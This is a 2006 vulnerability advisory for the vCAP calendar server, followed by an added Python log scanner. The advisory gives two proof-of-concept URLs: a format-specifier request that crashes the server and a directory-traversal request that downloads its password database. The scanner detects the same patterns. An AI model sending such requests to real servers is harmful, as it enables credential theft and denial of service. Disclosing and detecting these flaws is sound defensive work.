From: securma massine <securma_(at)_morx.org>
Date: 11.09.2006
Subject: vCAP calendar server Multiple vulnerabilities

title: vCAP calendar server Multiple vulnerabilities

Author: securma massine <securma@morx.org>
MorX Security Research Team
http://www.morx.org

Product info: vCAP (www.pscs.co.uk) is a network calendar server for Windows. vCAP allows users to create calendars which can be viewed and modified by people on the network using a web browser.

Original Advisory/PoC : http://www.morx.org/vcap.txt

Severity: Medium/High - user can remotely attack the server

Vulnerability Description:
v1: denial of service attack with a specific request
v2: directory traversal; any file on the system can be downloaded, especially vCAP's passwords (vCAP.db)

Affected Software(s): vCAP calendar server 1.9.0 Beta and prior

Affected platform(s): Windows

Exploit/Proof of Concept:
v1- http://127.0.0.1:6100/StoresAndCalendarsList.cgi?session=%d%d%d%d%d
v2- http://127.0.0.1:6100/../Data/vCAP.db

Solution : ??
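
Since the advisory lists no fix, access logs can at least be reviewed for the two request forms shown above. The following Python is an added example, not part of the original advisory or the vendor's code; the Common Log Format input, the function names and the sample entries are assumptions constructed for illustration, and the advisory does not say why the v1 request crashes the server, so that check only matches the pattern in the PoC.

```python
# Added example: names and the log format are assumptions, not vCAP's own.
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# printf-style conversion specifier, e.g. %d, %s, %08x, %n
FORMAT_SPEC = re.compile(r"%[-+ #0-9.]*[diouxXsnpc]")
# Request line inside a Common Log Format entry: "GET /path HTTP/1.1"
REQUEST_LINE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

def decode(value, rounds=2):
    """Percent-decode up to `rounds` times so double encoding is caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_target(target):
    """Return findings for one request target (path plus optional query)."""
    findings = []
    parts = urlsplit(target)
    # vCAP runs on Windows, where "\" is also a path separator.
    segments = decode(parts.path).replace("\\", "/").split("/")
    if ".." in segments:
        findings.append("traversal")
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == "session" and FORMAT_SPEC.search(decode(value, rounds=1)):
            findings.append("format-specifier-session")
    return findings

def scan(log_lines):
    """Return (line_number, findings) for log entries that need review."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_LINE.search(line)
        findings = inspect_target(match.group(1)) if match else []
        if findings:
            hits.append((number, findings))
    return hits

# Constructed sample entries built from the advisory's two request forms.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Sep/2006:10:00:01 +0000] "GET /StoresAndCalendarsList.cgi?session=8f3a21 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [11/Sep/2006:10:00:05 +0000] "GET /StoresAndCalendarsList.cgi?session=%d%d%d%d%d HTTP/1.1" 200 0',
    '192.0.2.77 - - [11/Sep/2006:10:00:09 +0000] "GET /../Data/vCAP.db HTTP/1.1" 200 20480',
]
if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The path check compares whole segments after decoding, so a file name that merely contains two dots is not flagged.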

History:
16/08/2006   initial vendor contact
17/08/2006   sending vulnerability details
31/08/2006   vulnerability confirmed


Disclaimer:
This entire document is for educational, testing and demonstration purposes only. The author does not have any responsibility for any malicious use of this advisory or proof of concept code.



